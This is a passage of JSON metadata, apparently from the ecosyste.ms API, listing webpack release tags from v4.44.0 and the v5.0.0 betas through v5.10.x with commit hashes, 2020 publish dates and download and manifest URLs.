ack%2Fwebpack/tags/v5.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.2/manifests"},{"name":"v5.10.1","sha":"3f3d0138f9c18658be87d89d609fc7c6d286005f","kind":"tag","published_at":"2020-12-11T20:32:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.1/manifests"},{"name":"v5.10.0","sha":"06e1cce1221ca717fc8efbaeca5ca71246f85a44","kind":"tag","published_at":"2020-12-04T19:26:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.0/manifests"},{"name":"v5.9.0","sha":"0e7437dc3042874649919d4ffe005db13053c4ff","kind":"tag","published_at":"2020-11-28T21:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.9.0/manifests"},{"name":"v5.8.0","sha":"fb7d09b315bbf3b5388eed0cc5e58309187a3acc","kind":"tag","published_at":"2020-11-26T17:58:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.8.0/manifests"},{"name":"v5.7.0","sha":"4ba6d2ea67e9046cbba83f588989b3cadff7d911","kind":"tag","published_at":"2020-11-26T06:08:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.7.0/manifests"},{"name":"v5.6.0","sha":"1936615458352f38ff517d258b936d690a7b631f","kind":"tag","published_at":"2020-11-19T12:18:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.6.0/manifests"},{"name":"v5.5.1","sha":"a6ebce41059a029163a1774b35d81e0bfaa05b27","kind":"tag","published_at":"2020-11-18T12:39:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.1/manifests"},{"name":"v5.5.0","sha":"3471c776059ac2d26593ea39f9c47c1874253dbb","kind":"tag","published_at":"2020-11-17T13:23:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6